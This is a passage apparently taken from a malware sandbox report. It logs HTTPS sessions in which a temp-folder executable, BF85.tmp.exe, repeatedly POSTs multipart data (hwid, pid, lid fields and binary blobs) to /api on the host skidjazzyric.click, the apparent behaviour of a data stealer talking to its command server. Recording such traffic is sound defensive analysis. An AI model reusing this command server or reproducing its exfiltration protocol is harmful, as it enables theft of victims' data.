                                                                          Set-Cookie: PHPSESSID=gg62nkg1cpiha5l2d657dphqo4; expires=Mon, 05 May 2025 01:20:18 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 1; mode=block
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvPZQr5kxjEzyzhBoboRuGrofCxKkvIe95l2zXC88MEFuPMT5rJ8bbWBfTlQufDrOvI6XgtCkkKio1SQnEEAaBtnKhxDNyEkcKfmRP5XcbO3LmnRJce9XjkKrRCmMGGHJS4XwSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2bd8b0deb7c6a-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1956&rtt_var=752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3057&recv_bytes=976&delivery_rate=2157635&cwnd=219&unsent_bytes=0&cid=35005a72f434efc6&ts=473&x=0"
                                                                          2025-01-09 07:33:40 UTC248INData Raw: 34 63 39 30 0d 0a 73 51 45 5a 6d 37 4c 6d 61 36 75 56 5a 43 4e 5a 30 30 79 4b 32 31 32 6a 65 41 34 37 4f 58 31 4a 35 4c 53 67 44 6f 46 77 4b 78 4c 4b 49 32 2b 35 69 4e 4a 48 69 65 59 42 41 57 4f 6e 50 76 2b 2b 63 59 45 5a 61 68 6b 44 47 79 69 49 78 38 55 69 6f 77 5a 47 4d 49 74 6e 65 50 66 42 67 30 65 4a 38 42 77 42 59 34 67 33 71 4c 34 7a 67 55 49 73 58 6c 4d 66 4b 49 6a 57 77 57 58 75 41 45 64 78 32 57 31 2b 38 39 65 46 44 38 72 35 43 55 59 38 74 69 33 67 74 54 54 4f 45 47 4d 5a 46 56 38 73 6e 70 61 61 4c 4d 77 56 58 33 50 38 59 47 72 77 6b 4a 74 48 30 4c 63 42 54 58 76 70 62 75 75 2b 50 38 38 65 61 6c 42 52 46 53 47 41 31 38 52 6b 38 52 6c 4e 65 74 6c 6a 66 66 4c 64 6a 42 76 48 38 77 35 4e 4f 72 77 74 71 50 64 2f 78 67 49 73 41 52
                                                                          Data Ascii: 4c90sQEZm7Lma6uVZCNZ00yK212jeA47OX1J5LSgDoFwKxLKI2+5iNJHieYBAWOnPv++cYEZahkDGyiIx8UiowZGMItnePfBg0eJ8BwBY4g3qL4zgUIsXlMfKIjWwWXuAEdx2W1+89eFD8r5CUY8ti3gtTTOEGMZFV8snpaaLMwVX3P8YGrwkJtH0LcBTXvpbuu+P88ealBRFSGA18Rk8RlNetljffLdjBvH8w5NOrwtqPd/xgIsAR
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 74 4d 47 59 58 48 30 33 6e 75 41 6b 38 77 7a 43 31 69 75 64 65 49 53 5a 47 33 44 6b 30 31 74 43 33 6e 76 6a 37 42 43 47 4e 5a 57 42 63 6a 67 74 7a 4e 59 2b 77 63 51 33 66 62 61 6e 7a 32 31 34 77 50 78 76 52 47 44 33 75 32 4e 71 6a 68 66 2b 45 4b 62 31 70 50 45 6a 72 47 79 59 78 31 6f 78 56 46 4d 49 73 6a 66 66 66 52 69 51 6e 62 2f 77 31 4b 50 71 4d 6c 34 62 51 79 77 52 64 6d 56 6c 67 66 4c 49 7a 63 7a 57 62 6e 48 30 52 32 30 32 4d 37 74 35 43 44 45 59 6d 76 52 6d 49 2b 6f 53 6e 6b 72 33 33 37 57 6e 4d 58 51 6c 38 73 69 70 61 61 4c 4f 73 58 53 6e 50 59 62 48 6a 78 32 35 59 4a 32 2f 45 4c 52 43 6d 33 4b 2b 61 7a 50 4e 4d 51 59 6c 39 59 46 69 43 50 30 38 56 6f 6f 31 77 4a 64 38 73 6a 49 37 6e 78 69 51 4c 46 2f 52 46 42 65 36 35 67 38 66 6b 34 7a 56 6f 30 47
                                                                          Data Ascii: tMGYXH03nuAk8wzC1iudeISZG3Dk01tC3nvj7BCGNZWBcjgtzNY+wcQ3fbanz214wPxvRGD3u2Nqjhf+EKb1pPEjrGyYx1oxVFMIsjfffRiQnb/w1KPqMl4bQywRdmVlgfLIzczWbnH0R202M7t5CDEYmvRmI+oSnkr337WnMXQl8sipaaLOsXSnPYbHjx25YJ2/ELRCm3K+azPNMQYl9YFiCP08Voo1wJd8sjI7nxiQLF/RFBe65g8fk4zVo0G
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 47 6d 49 4a 72 2b 31 49 52 4d 50 6c 67 62 2f 72 61 78 6a 7a 4b 2b 51 68 47 4c 66 45 78 70 71 42 2f 78 68 59 73 41 52 73 53 4b 6f 37 51 30 47 50 75 45 55 64 2b 33 47 5a 30 38 64 43 45 42 4d 7a 7a 44 55 6f 34 76 43 72 36 73 7a 2f 4a 48 32 31 54 55 56 39 6c 78 74 48 61 4c 4c 74 53 65 47 66 59 49 55 37 36 33 6f 6f 4f 33 37 63 5a 44 79 4c 78 4b 65 54 35 5a 34 45 58 5a 46 78 65 45 43 71 4d 32 4d 64 6d 37 78 70 48 63 38 46 73 66 2f 6e 63 6a 41 50 45 2b 51 4a 4a 4d 72 6f 6c 37 72 6b 2b 79 31 6f 69 47 56 77 48 61 39 36 57 39 6d 76 76 48 30 59 79 35 6d 42 31 39 39 65 53 53 64 61 35 48 77 45 38 76 57 36 77 2b 54 50 49 47 6d 64 54 58 78 38 73 69 39 50 42 61 2b 41 66 54 6e 72 64 5a 48 2f 31 32 59 6b 50 79 66 41 43 52 43 6d 30 4a 2b 53 31 66 34 39 61 61 30 45 62 52 32
                                                                          Data Ascii: GmIJr+1IRMPlgb/raxjzK+QhGLfExpqB/xhYsARsSKo7Q0GPuEUd+3GZ08dCEBMzzDUo4vCr6sz/JH21TUV9lxtHaLLtSeGfYIU763ooO37cZDyLxKeT5Z4EXZFxeECqM2Mdm7xpHc8Fsf/ncjAPE+QJJMrol7rk+y1oiGVwHa96W9mvvH0Yy5mB199eSSda5HwE8vW6w+TPIGmdTXx8si9PBa+AfTnrdZH/12YkPyfACRCm0J+S1f49aa0EbR2
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 4c 4c 74 53 51 48 6e 42 62 58 58 77 33 59 49 42 7a 76 6b 4c 53 6a 32 36 4b 65 2b 2f 4d 73 6b 58 61 56 70 61 47 79 47 55 31 63 6c 6d 37 68 67 4a 50 70 4e 6b 59 37 6d 49 78 43 37 46 33 68 5a 61 4b 61 64 75 39 2f 63 6d 67 52 31 67 47 51 4e 66 4b 49 6e 66 7a 57 54 72 48 55 5a 30 33 57 56 39 39 4e 57 4c 41 39 76 2f 43 45 77 77 76 69 58 36 75 54 4c 46 46 6d 68 52 55 42 56 72 79 4a 62 46 64 4b 4e 4b 43 55 58 65 62 48 76 36 78 73 51 57 68 2b 35 47 52 6a 66 78 64 71 69 31 4d 63 45 56 59 46 56 51 46 79 71 4b 32 4d 56 70 36 68 70 42 59 74 4a 6e 63 2f 6a 65 69 77 6a 4e 38 67 4e 46 50 4c 55 6f 35 2f 6c 78 67 52 31 30 47 51 4e 66 42 4b 48 6a 67 45 33 5a 55 6c 59 2b 79 69 4e 38 39 5a 44 63 53 63 58 30 43 6b 6b 30 74 79 66 6b 73 7a 62 4b 46 6d 64 64 56 78 59 75 67 4e 66
                                                                          Data Ascii: LLtSQHnBbXXw3YIBzvkLSj26Ke+/MskXaVpaGyGU1clm7hgJPpNkY7mIxC7F3hZaKadu9/cmgR1gGQNfKInfzWTrHUZ03WV99NWLA9v/CEwwviX6uTLFFmhRUBVryJbFdKNKCUXebHv6xsQWh+5GRjfxdqi1McEVYFVQFyqK2MVp6hpBYtJnc/jeiwjN8gNFPLUo5/lxgR10GQNfBKHjgE3ZUlY+yiN89ZDcScX0Ckk0tyfkszbKFmddVxYugNf
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 45 35 35 77 57 31 32 39 74 69 4d 41 4d 6a 7a 41 30 77 39 76 53 54 70 76 6a 48 50 45 69 77 58 47 78 67 7a 78 6f 36 43 54 66 4d 4a 57 32 62 65 51 6e 62 32 6b 4a 74 48 30 4c 63 42 54 58 76 70 62 75 47 72 4f 38 77 49 5a 56 35 56 45 43 69 55 31 38 39 6e 38 52 56 47 64 4e 52 76 66 66 62 57 68 51 7a 44 2b 77 46 45 4d 4c 34 69 71 50 64 2f 78 67 49 73 41 52 73 78 49 4a 58 42 77 57 4c 6f 42 46 49 77 7a 43 31 69 75 64 65 49 53 5a 47 33 42 55 6f 77 74 53 37 6b 75 54 76 4d 47 6e 35 57 58 42 67 69 6a 63 54 49 61 2b 51 5a 51 58 76 63 5a 57 6e 31 33 70 59 4d 32 2b 56 47 44 33 75 32 4e 71 6a 68 66 2f 63 64 66 45 6c 59 58 52 71 51 31 64 52 6e 37 68 34 4a 62 35 31 36 4f 2f 37 63 78 46 47 4a 38 51 6c 49 4f 4c 34 76 34 62 55 79 78 42 4e 70 57 46 30 62 49 59 7a 57 78 47 72 69
                                                                          Data Ascii: E55wW129tiMAMjzA0w9vSTpvjHPEiwXGxgzxo6CTfMJW2beQnb2kJtH0LcBTXvpbuGrO8wIZV5VECiU189n8RVGdNRvffbWhQzD+wFEML4iqPd/xgIsARsxIJXBwWLoBFIwzC1iudeISZG3BUowtS7kuTvMGn5WXBgijcTIa+QZQXvcZWn13pYM2+VGD3u2Nqjhf/cdfElYXRqQ1dRn7h4Jb516O/7cxFGJ8QlIOL4v4bUyxBNpWF0bIYzWxGri
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 4e 6b 64 37 6d 49 78 41 72 4f 39 41 64 4c 4d 72 30 68 37 37 30 74 79 78 31 2b 57 46 6f 55 4a 6f 72 57 7a 32 48 70 45 30 42 39 33 32 35 38 2f 74 2b 42 53 59 65 33 41 56 6c 37 36 57 37 4a 74 44 54 4e 51 54 59 5a 52 46 45 79 78 74 48 4f 4c 4c 74 53 53 58 72 57 61 58 62 36 33 34 63 62 79 50 45 55 51 54 61 37 50 4f 4b 79 4f 73 77 58 59 56 70 64 47 53 43 4b 78 4d 74 73 34 42 6b 4a 50 70 4e 6b 59 37 6d 49 78 43 72 65 34 51 78 47 4e 36 63 6c 36 62 6f 70 7a 41 6f 73 46 78 73 4f 4c 4a 65 57 6d 6e 72 7a 42 55 35 76 6e 58 6f 37 2f 74 7a 45 55 59 6e 78 44 30 63 38 74 79 44 36 76 44 6e 4f 46 57 56 51 58 78 63 6f 68 74 4c 47 61 2b 59 52 52 58 76 55 59 48 54 39 32 59 6f 41 78 72 64 49 41 54 79 70 62 72 44 35 48 74 6f 5a 59 46 51 62 41 47 57 66 6c 73 56 67 6f 30 6f 4a 66
                                                                          Data Ascii: Nkd7mIxArO9AdLMr0h770tyx1+WFoUJorWz2HpE0B93258/t+BSYe3AVl76W7JtDTNQTYZRFEyxtHOLLtSSXrWaXb634cbyPEUQTa7POKyOswXYVpdGSCKxMts4BkJPpNkY7mIxCre4QxGN6cl6bopzAosFxsOLJeWmnrzBU5vnXo7/tzEUYnxD0c8tyD6vDnOFWVQXxcohtLGa+YRRXvUYHT92YoAxrdIATypbrD5HtoZYFQbAGWflsVgo0oJf
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 79 78 6f 45 4f 33 37 55 7a 51 6a 57 2f 4b 66 37 35 49 50 35 55 4c 46 67 62 52 78 4b 66 6c 74 51 73 75 30 41 48 4d 4d 45 6a 49 37 6d 58 68 78 76 62 38 51 56 58 4f 50 59 51 31 70 34 70 79 78 31 38 58 6b 77 51 61 38 69 57 7a 53 79 37 4b 77 6c 35 31 48 68 71 37 39 32 55 44 6f 6e 49 53 41 45 6a 38 58 61 6f 6a 44 7a 50 46 47 74 50 53 6c 49 4d 6b 4e 7a 46 66 4f 51 46 52 6a 43 64 49 33 32 35 69 4e 64 48 69 66 4d 58 41 57 50 68 66 4c 50 73 62 4a 5a 4b 50 6b 59 56 42 6d 75 51 6c 70 6f 2b 72 56 4a 62 4d 49 73 6a 50 50 72 43 6c 67 2f 4b 34 51 55 47 42 59 38 4a 38 72 51 35 31 67 74 53 5a 31 77 46 4a 6f 44 42 30 79 44 32 45 55 64 2b 31 48 55 37 74 35 43 4c 53 5a 48 4f 52 67 6c 37 6a 6d 43 6f 6f 58 2b 5a 57 6c 6c 61 56 52 45 73 6b 4d 65 50 53 2f 6b 66 54 32 66 43 49 7a
                                                                          Data Ascii: yxoEO37UzQjW/Kf75IP5ULFgbRxKfltQsu0AHMMEjI7mXhxvb8QVXOPYQ1p4pyx18XkwQa8iWzSy7Kwl51Hhq792UDonISAEj8XaojDzPFGtPSlIMkNzFfOQFRjCdI325iNdHifMXAWPhfLPsbJZKPkYVBmuQlpo+rVJbMIsjPPrClg/K4QUGBY8J8rQ51gtSZ1wFJoDB0yD2EUd+1HU7t5CLSZHORgl7jmCooX+ZWllaVREskMePS/kfT2fCIz
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 43 74 76 6c 41 45 49 74 73 6d 6e 57 68 78 6a 50 48 57 31 50 53 77 67 6b 75 4f 6a 58 62 2b 30 63 54 6d 62 43 49 7a 57 35 33 38 52 52 38 4c 64 4f 41 51 54 2f 62 76 44 35 5a 34 45 76 62 31 64 56 47 44 32 58 6d 2b 56 69 35 42 4e 66 59 4d 52 73 4f 37 65 51 67 6b 6d 52 70 55 67 42 50 36 42 75 73 4f 6c 74 6d 6b 38 2f 44 67 74 4e 4e 4d 6a 50 67 6e 71 6a 53 68 73 2b 6b 33 45 37 6f 5a 44 44 43 74 76 6c 41 45 49 74 73 6d 6e 57 68 78 6a 50 48 57 31 50 53 77 67 6b 79 66 6a 30 54 64 30 73 58 48 50 64 62 58 7a 76 77 63 52 48 69 66 68 47 47 51 4c 78 5a 71 69 47 63 59 45 43 4c 41 45 62 4b 69 69 49 32 4d 56 36 38 6c 39 75 66 74 52 69 62 65 6e 48 69 30 62 6e 77 53 63 42 64 66 45 6f 71 4f 46 74 6a 31 70 6f 53 42 74 48 65 39 53 4e 6c 7a 2b 30 51 68 74 76 6e 58 6f 37 37 35 44
                                                                          Data Ascii: CtvlAEItsmnWhxjPHW1PSwgkuOjXb+0cTmbCIzW538RR8LdOAQT/bvD5Z4Evb1dVGD2Xm+Vi5BNfYMRsO7eQgkmRpUgBP6BusOltmk8/DgtNNMjPgnqjShs+k3E7oZDDCtvlAEItsmnWhxjPHW1PSwgkyfj0Td0sXHPdbXzvwcRHifhGGQLxZqiGcYECLAEbKiiI2MV68l9uftRibenHi0bnwScBdfEoqOFtj1poSBtHe9SNlz+0QhtvnXo775D
                                                                          2025-01-09 07:33:40 UTC1369INData Raw: 51 46 52 4f 50 46 67 71 4c 56 2f 6d 56 70 68 53 31 77 50 4b 4d 72 52 32 47 75 6a 44 51 64 70 6b 33 55 37 6f 59 50 4b 53 64 75 33 58 67 46 38 76 79 50 70 75 6a 48 43 43 48 35 66 57 41 6b 6f 77 65 6a 38 51 66 45 56 57 58 4f 52 55 6e 62 39 78 70 45 4b 32 66 41 34 66 78 61 6a 4b 66 69 36 66 65 30 64 59 56 56 6c 49 52 79 58 30 64 49 75 78 52 46 66 63 35 4d 74 4f 2b 47 51 33 45 6e 6b 35 51 46 52 4f 50 4d 43 37 37 51 7a 67 51 55 69 51 42 73 4a 61 39 36 46 6a 43 7a 78 55 68 45 77 6c 47 42 70 36 39 61 48 48 38 71 77 4f 48 38 57 6f 79 6e 34 75 6e 33 77 46 32 68 50 54 68 77 37 67 65 6a 38 51 66 45 56 57 58 4f 52 52 6b 47 37 34 5a 49 4b 79 66 6b 42 41 58 58 78 4e 71 6a 68 66 2b 77 49 61 30 6c 59 58 51 36 38 6c 50 4e 36 34 42 4a 48 64 35 4d 74 4f 2f 57 51 33 45 6e 45
                                                                          Data Ascii: QFROPFgqLV/mVphS1wPKMrR2GujDQdpk3U7oYPKSdu3XgF8vyPpujHCCH5fWAkowej8QfEVWXORUnb9xpEK2fA4fxajKfi6fe0dYVVlIRyX0dIuxRFfc5MtO+GQ3Enk5QFROPMC77QzgQUiQBsJa96FjCzxUhEwlGBp69aHH8qwOH8Woyn4un3wF2hPThw7gej8QfEVWXORRkG74ZIKyfkBAXXxNqjhf+wIa0lYXQ68lPN64BJHd5MtO/WQ3EnE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649764104.21.64.14432828C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:41 UTC278OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=QYJK4DM0PCEP
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 12818
                                                                          Host: skidjazzyric.click
                                                                          2025-01-09 07:33:41 UTC12818OUTData Raw: 2d 2d 51 59 4a 4b 34 44 4d 30 50 43 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 42 46 34 39 44 41 34 32 39 39 30 33 32 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 51 59 4a 4b 34 44 4d 30 50 43 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 59 4a 4b 34 44 4d 30 50 43 45 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 51 59 4a 4b 34 44 4d 30 50 43 45 50 0d 0a 43 6f 6e 74 65
                                                                          Data Ascii: --QYJK4DM0PCEPContent-Disposition: form-data; name="hwid"BFBF49DA42990322D0632DF0E28DC412--QYJK4DM0PCEPContent-Disposition: form-data; name="pid"2--QYJK4DM0PCEPContent-Disposition: form-data; name="lid"4h5VfH----QYJK4DM0PCEPConte
                                                                          2025-01-09 07:33:41 UTC1138INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:41 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=ll8n6pg3o2qs40fkimv33ueitu; expires=Mon, 05 May 2025 01:20:20 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 1; mode=block
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xmjv88%2FIE%2B%2Bo9dNwKfrSRxBobyIRds6MMeckn7%2F0QQ%2FDIZvHh%2F0E0BQ3T8n27emfNppG4U5CDI5ACWXb5FvKnwzfNUQ3tqofz400Aj3no98AC%2BacacYPSFPDMxeS2Tp2ydhSsOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2bd95fc69de95-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1613&rtt_var=615&sent=9&recv=17&lost=0&retrans=0&sent_bytes=3058&recv_bytes=13754&delivery_rate=2644927&cwnd=243&unsent_bytes=0&cid=2205f1a42b8b15ad&ts=567&x=0"
                                                                          2025-01-09 07:33:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                          Data Ascii: fok 8.46.123.189
                                                                          2025-01-09 07:33:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649771104.21.64.14432828C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:42 UTC282OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=DFN4NM2K8YOHJDWP
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 15088
                                                                          Host: skidjazzyric.click
                                                                          2025-01-09 07:33:42 UTC15088OUTData Raw: 2d 2d 44 46 4e 34 4e 4d 32 4b 38 59 4f 48 4a 44 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 42 46 34 39 44 41 34 32 39 39 30 33 32 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 44 46 4e 34 4e 4d 32 4b 38 59 4f 48 4a 44 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 46 4e 34 4e 4d 32 4b 38 59 4f 48 4a 44 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 44 46 4e 34 4e 4d 32
                                                                          Data Ascii: --DFN4NM2K8YOHJDWPContent-Disposition: form-data; name="hwid"BFBF49DA42990322D0632DF0E28DC412--DFN4NM2K8YOHJDWPContent-Disposition: form-data; name="pid"2--DFN4NM2K8YOHJDWPContent-Disposition: form-data; name="lid"4h5VfH----DFN4NM2
                                                                          2025-01-09 07:33:43 UTC1133INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:43 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=n3tr9cnvt85eepge3teq92nb2b; expires=Mon, 05 May 2025 01:20:21 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 1; mode=block
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TnbgohMsF4F4ipHG%2BkcrMgGPQMQekvRH2Lv64SwKg%2BL878CkFS5bRxnZbvzbDr1HjDZGKc127SUQKqwr1bB17puU%2B599JS3MPPjOWlA53%2Bz9HqJnmaBHfmufUVUdTetLRaj7OsA%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2bd9d5a8c8ca1-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2347&min_rtt=1930&rtt_var=1559&sent=11&recv=20&lost=0&retrans=0&sent_bytes=3057&recv_bytes=16028&delivery_rate=830804&cwnd=169&unsent_bytes=0&cid=3f36cd2ca304f68d&ts=520&x=0"
                                                                          2025-01-09 07:33:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                          Data Ascii: fok 8.46.123.189
                                                                          2025-01-09 07:33:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649782104.21.64.14432828C:\Users\user\AppData\Local\Temp\BF85.tmp.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:33:44 UTC285OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=CV3YHPTLGJRPARNJ21K
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 19964
                                                                          Host: skidjazzyric.click
                                                                          2025-01-09 07:33:44 UTC15331OUTData Raw: 2d 2d 43 56 33 59 48 50 54 4c 47 4a 52 50 41 52 4e 4a 32 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 46 42 46 34 39 44 41 34 32 39 39 30 33 32 32 44 30 36 33 32 44 46 30 45 32 38 44 43 34 31 32 0d 0a 2d 2d 43 56 33 59 48 50 54 4c 47 4a 52 50 41 52 4e 4a 32 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 56 33 59 48 50 54 4c 47 4a 52 50 41 52 4e 4a 32 31 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a
                                                                          Data Ascii: --CV3YHPTLGJRPARNJ21KContent-Disposition: form-data; name="hwid"BFBF49DA42990322D0632DF0E28DC412--CV3YHPTLGJRPARNJ21KContent-Disposition: form-data; name="pid"3--CV3YHPTLGJRPARNJ21KContent-Disposition: form-data; name="lid"4h5VfH--
                                                                          2025-01-09 07:33:44 UTC4633OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de
                                                                          Data Ascii: +?2+?2+?o?Mp5p_
                                                                          2025-01-09 07:33:44 UTC1133INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:33:44 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=5p96r7vgcoiutvqjt7s66g038u; expires=Mon, 05 May 2025 01:20:23 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          X-Frame-Options: DENY
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 1; mode=block
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEZfkZ3NTMkDlegzh4uFfUgXYP8%2FcfL3LCZOdnn72tX%2Fm7hCBHeEwGtHbEUtt%2BVqoVGLlanogO6x01zAMTCjFbTivPVwkiRWzWdGYXtRk4K5D8y9bdbNKX9bWTZgRIcbh3T%2Fivg%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
